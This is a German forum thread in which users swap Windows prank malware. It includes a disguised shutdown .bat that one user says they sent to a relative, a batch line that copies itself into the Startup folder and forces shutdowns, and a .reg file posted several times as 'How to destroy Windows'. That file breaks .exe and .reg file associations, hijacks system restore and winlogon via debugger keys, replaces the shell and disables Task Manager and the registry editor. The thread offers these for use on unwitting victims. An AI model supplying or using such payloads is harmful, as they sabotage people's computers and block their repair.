D
Wie sollte das passieren?Hachja die .bat Dateien
Der Shutdownklassiker..
Einen gemacht, Symbol verändert, Namen geändert und an meine Tante per Skype gesendet ^^
An euch etwas vortgeschritteneren:
Geht es wenn ich den ShutdownCode mit einem goto versehe?
Sodass nach dem Ausgehen bzw. wieder angehen der PC wieder runterfährt, also so dass der PC hoch und runter fäht?![]()
Vielleicht könnte man ins Txt nen Code reinklatschen, dass wenn man die Datei öffnet sie sich zu dem Autostart hinzufügt.Wie sollte das passieren?
Da müsste sich die Datei immer nach dem Pc-start gestartet werden.
Vielleicht könnte man ins Txt nen Code reinklatschen, dass wenn man die Datei öffnet sie sich zu dem Autostart hinzufügt.
Geht das?
KlassikerCode:copy "Datei.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" shutdown -s -t 10 -c "Cool."
Naja .reg Dateien sind generell viel besser. Damit kann man den Computer richtig zerstören, in dem man die Daten in dem Registrierungs-Editor "bisschen" verändert![]()
Danke dir
Stimmt. ._.
Kann sein. o:^^ (Ne Frage an dich: Kenn ich dich von dCR??)
OkKann sein. o:
Könnte man ja mal machen c:Ok
Ich möchte mich jetzt mehr mit .bat beschäftigen ^^
Lass n Team aufmachen^^
Ok würde mich freuen
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.exe]
@="notepad.exe"
"Content Type"="application/x-msdownload"
// .exe Dateien gehen weg
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"Debugger"="c:\\windows\\system32\\notepad.exe"
// Die Systemwiederherstellung ist nun auch nicht mehr möglich.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="c:\\windows\\system32\\msinfo32.exe"
// Standardmäßig: explorer.exe
[HKEY_CLASSES_ROOT\.reg]
@="notepad.exe"
// Damit man nicht mit .reg Dateien wieder seinen Computer reparieren kann, müssen auch die .reg Dateien sich verabschieden
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001
// Auch, wenn .exe Dateien ( etc. ) gesperrt werden, kann auch der Task Manager und der Registrierungs-Editor gesperrt sein. ;)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe]
"Debugger"="msinfo32.exe" // winlogon.exe wird statt ein "anderes" Programm ersetzt, oder wie auch andere sagen: entführt.
Immer nur Windows kaputt machen. ._.Mal was besseres ..
How to destroy Windows [.reg File]:
Code:Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.exe] @="notepad.exe" "Content Type"="application/x-msdownload" // .exe Dateien gehen weg [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe] "Debugger"="c:\\windows\\system32\\notepad.exe" // Die Systemwiederherstellung ist nun auch nicht mehr möglich. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "Shell"="c:\\windows\\system32\\msinfo32.exe" // Standardmäßig: explorer.exe [HKEY_CLASSES_ROOT\.reg] @="notepad.exe" // Damit man nicht mit .reg Dateien wieder seinen Computer reparieren kann, müssen auch die .reg Dateien sich verabschieden [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "DisableTaskMgr"=dword:00000001 "DisableRegistryTools"=dword:00000001 // Auch, wenn .exe Dateien ( etc. ) gesperrt werden, kann auch der Task Manager und der Registrierungs-Editor gesperrt sein. ;)
Also klatscht man an die txt anstatt n` .bat ein .reg ran?Mal was besseres ..
How to destroy Windows [.reg File]:
Code:Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.exe] @="notepad.exe" "Content Type"="application/x-msdownload" // .exe Dateien gehen weg [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe] "Debugger"="c:\\windows\\system32\\notepad.exe" // Die Systemwiederherstellung ist nun auch nicht mehr möglich. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "Shell"="c:\\windows\\system32\\msinfo32.exe" // Standardmäßig: explorer.exe [HKEY_CLASSES_ROOT\.reg] @="notepad.exe" // Damit man nicht mit .reg Dateien wieder seinen Computer reparieren kann, müssen auch die .reg Dateien sich verabschieden [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "DisableTaskMgr"=dword:00000001 "DisableRegistryTools"=dword:00000001 // Auch, wenn .exe Dateien ( etc. ) gesperrt werden, kann auch der Task Manager und der Registrierungs-Editor gesperrt sein. ;)
Also klatscht man an die txt anstatt n` .bat ein .reg ran?
[.reg File]
Ist an sich eine gute SacheImmer nur Windows kaputt machen. ._.